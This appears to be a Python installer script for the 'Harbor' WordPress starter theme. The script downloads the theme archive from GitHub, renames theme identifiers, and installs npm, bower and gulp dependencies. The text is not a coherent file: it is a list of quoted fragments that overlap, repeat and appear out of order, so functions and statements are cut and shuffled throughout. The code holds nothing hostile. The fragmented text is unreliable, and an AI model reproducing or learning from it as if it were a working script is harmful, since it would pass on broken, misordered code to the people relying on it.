"content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\")",
"= glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\" + slug +",
"based on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug",
"1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\",",
"dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\") if(__name__ == \"__main__\"):",
"= name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a",
"= subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is",
"line in update_file: results = update_avail.findall(line) if results != []: print(line) nameMatch =",
"\"Windows\": if os.getuid() != 0: print(\"Please run this script as root\") print(\"Example: 'sudo",
"print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" +",
"+ \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ',",
"= results.install update = results.update setup_dir = results.dir if(install): if setup_dir is not",
"\"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name))",
"update_file: results = update_avail.findall(line) if results != []: print(line) nameMatch = nameRe.search(line) name",
"!= \"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans = input(\"Update",
"= input(\"Enter a short description for the theme: \") print(\"Setting up Theme...\", end='",
"harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\")",
"print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True",
"funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a short description for the",
"setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates",
"from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end='",
"help=\"Specify a directory to install Harbor theme to or if -u option is",
"to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\")",
"subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not",
"sys, getopt import argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update',",
"if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\")",
"_s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\",",
"a starter theme and development environment setup by Infinity Marketing that is heavily",
"Harbor is a starter theme and development environment setup by Infinity Marketing that",
"os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run this script",
"end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme():",
"name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a short",
"script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list",
"starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading",
"import platform import sys, getopt import argparse import re def main(): parser =",
"-*- \"\"\" Created on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import",
"gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing",
"<code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\"))",
"strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug):",
"= open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() ==",
"update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor",
"files: file = open(filename, \"r\") filedata = file.read() file.close() for change in strings:",
"+ slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is",
"!= 0: print(\"Please run this script as root\") print(\"Example: 'sudo python3 setup.py'\") return",
"slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename in files:",
"action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir',",
"shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\")",
"print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is not",
"#download theme zip if fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug",
"except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code",
"open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\"",
"filename in files: file = open(filename, \"r\") filedata = file.read() file.close() for change",
"#! /usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Thu Aug",
"\"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\",",
"cmd = \"where\" if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \"",
"Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter theme and",
"present updates the Harbor based theme in that directory\") plat = platform.system() results",
"if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update",
"[\"./\" + slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug",
"on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug +",
"run this script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip",
"files = glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\" + slug",
"installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode",
"\"\"\" import zipfile import os import requests import glob import subprocess import platform",
"file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a problem while",
"theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" +",
"'--update', action='store_true', dest='update', default=False, help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install',",
"+ \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files):",
"parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates to the",
"= results.update setup_dir = results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if",
"headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter",
"os.getuid() != 0: print(\"Please run this script as root\") print(\"Example: 'sudo python3 setup.py'\")",
"is heavily based on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\"",
"!= \"Windows\": if os.getuid() != 0: print(\"Please run this script as root\") print(\"Example:",
"not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)",
"updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with",
"npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is not",
"file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else \"which\" npm",
"default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a",
"while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content)",
"slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter",
"print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\")",
"Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There",
"import sys, getopt import argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u',",
"open(filename, \"r\") filedata = file.read() file.close() for change in strings: filedata = filedata.replace(change[0],",
"'-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a short description for",
"stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end='",
"stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode ==",
"open(\"updates.tmp\", \"r\") as update_file: for line in update_file: results = update_avail.findall(line) if results",
"\"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug",
"= nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\"",
"print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if fetchArchive() == False: return",
"argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates to the harbor script\")",
"1: print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True,",
"to or if -u option is present updates the Harbor based theme in",
"install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug)",
"updates the Harbor based theme in that directory\") plat = platform.system() results =",
"module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower",
"\"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else",
"else: print(\"Checking for updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def",
"') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a problem",
"\"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename in files: file =",
"subprocess import platform import sys, getopt import argparse import re def main(): parser",
"try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\")",
"def findInFiles(strings, files): for filename in files: file = open(filename, \"r\") filedata =",
"') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\",",
"with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\",",
"input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \")",
"update = results.update setup_dir = results.dir if(install): if setup_dir is not None: os.chdir(setup_dir)",
"[]: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while",
"with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name =",
"strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') +",
"theme zip if fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug =",
"\"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\")",
"based theme in that directory\") plat = platform.system() results = parser.parse_args() install =",
"short description for the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\"",
"<NAME> \"\"\" import zipfile import os import requests import glob import subprocess import",
"= re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\")",
"return True def setupTheme(): name = input(\"Enter a name for the theme: \")",
"\" + name)) headerInfo.append((\"Description: Harbor is a starter theme and development environment setup",
"name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo =",
"ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] ==",
"<reponame>InfinityMarketing/Harbor-Script #! /usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Thu",
"Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower",
"update_file: for line in update_file: results = update_avail.findall(line) if results != []: print(line)",
"= platform.system() results = parser.parse_args() install = results.install update = results.update setup_dir =",
"nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\" and",
"Created on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import",
"= input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0]",
"by Infinity Marketing that is heavily based on Automattic's Underscores theme.\", \"Description: \"",
"= [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\"",
"# Downloads the starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except",
"= [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\",",
"starter theme and development environment setup by Infinity Marketing that is heavily based",
"bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing",
"directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor theme to",
"+ slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug +",
"updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating",
"npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+ \"",
"return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1:",
"if -u option is present updates the Harbor based theme in that directory\")",
"default=False, help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False,",
"findInFiles(strings, files): for filename in files: file = open(filename, \"r\") filedata = file.read()",
"+ \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename in files: file",
"the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files",
"file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system()",
"print(\"Error: There was a problem while downloading the files.\\n\\tAborting. \") return False with",
"\"r\") as update_file: for line in update_file: results = update_avail.findall(line) if results !=",
"results.install update = results.update setup_dir = results.dir if(install): if setup_dir is not None:",
"up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" + slug",
"for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor",
"files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug +",
"', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = []",
"setup.py'\") return #download theme zip if fetchArchive() == False: return 1 print(\"Setting up",
"= results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system() != \"Windows\":",
"and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0]",
"\"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug",
"subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True,",
"if results != []: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans =",
"platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode",
"findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug))",
"+ name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo",
"github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ')",
"+ \"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings =",
"platform.system() results = parser.parse_args() install = results.install update = results.update setup_dir = results.dir",
"14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os import requests import glob",
"[] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme",
"strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \"",
"desc = input(\"Enter a short description for the theme: \") print(\"Setting up Theme...\",",
"!= 'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'):",
"re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for",
"name for the theme: \") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace('",
"Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" + slug +",
"+ \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain:",
"theme: \") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc",
"!= []: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\")",
"install Harbor theme to or if -u option is present updates the Harbor",
"if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g",
"\") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end='",
"parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor theme to or",
"environment setup by Infinity Marketing that is heavily based on Automattic's Underscores theme.\",",
"files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was",
"2017 @author: <NAME> \"\"\" import zipfile import os import requests import glob import",
"os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0",
"def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\")",
"def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file",
"\" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings,",
"zip if fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug = setupTheme()",
"glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"):",
"Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\"",
"on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os",
"the theme: \") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_')",
"requests import glob import subprocess import platform import sys, getopt import argparse import",
"files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def",
"\"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = []",
"setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for",
"def setupTheme(): name = input(\"Enter a name for the theme: \") slug =",
"problem while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content:",
"theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme",
"input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0] !=",
"Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\",",
"and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans",
"python3 setup.py'\") return #download theme zip if fetchArchive() == False: return 1 print(\"Setting",
"files): for filename in files: file = open(filename, \"r\") filedata = file.read() file.close()",
"open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\")",
"heavily based on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" +",
"requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a problem while downloading the",
"3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os import requests import",
"import glob import subprocess import platform import sys, getopt import argparse import re",
"/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Thu Aug 3",
"Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode ==",
"subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not",
"!= 200: print(\"Error: There was a problem while downloading the files.\\n\\tAborting. \") return",
"desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!')",
"shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if",
"import argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update',",
"current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor theme",
"filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd",
"module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n':",
"headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name:",
"while ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans",
"coding: utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50 2017 @author: <NAME>",
"\"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug",
"stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm",
"updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme",
"os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if",
"', '-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a short description",
"glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug",
"shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\",",
"slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings,",
"print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans",
"strings = [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\"))",
"[] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\",",
"directory\") plat = platform.system() results = parser.parse_args() install = results.install update = results.update",
"fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif",
"+ slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" +",
"'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\") #",
"stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug)",
"the starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass",
"filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\"",
"print(\"Checking for updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory):",
"to install Harbor theme to or if -u option is present updates the",
"@author: <NAME> \"\"\" import zipfile import os import requests import glob import subprocess",
"Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os import",
"root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if fetchArchive() == False:",
"ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name) print(\"\")",
"subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\",",
"installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\")",
"for change in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata)",
"argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False,",
"return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir",
"re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in",
"if os.getuid() != 0: print(\"Please run this script as root\") print(\"Example: 'sudo python3",
"dest='dir', help=\"Specify a directory to install Harbor theme to or if -u option",
"help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install",
"print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+",
"input(\"Enter a short description for the theme: \") print(\"Setting up Theme...\", end=' ')",
"in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" +",
"slug) files = glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\" +",
"in that directory\") plat = platform.system() results = parser.parse_args() install = results.install update",
"getopt import argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true',",
"> updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0)",
"False: return 1 print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if",
"'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\",",
"print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True,",
"slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain:",
"in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def",
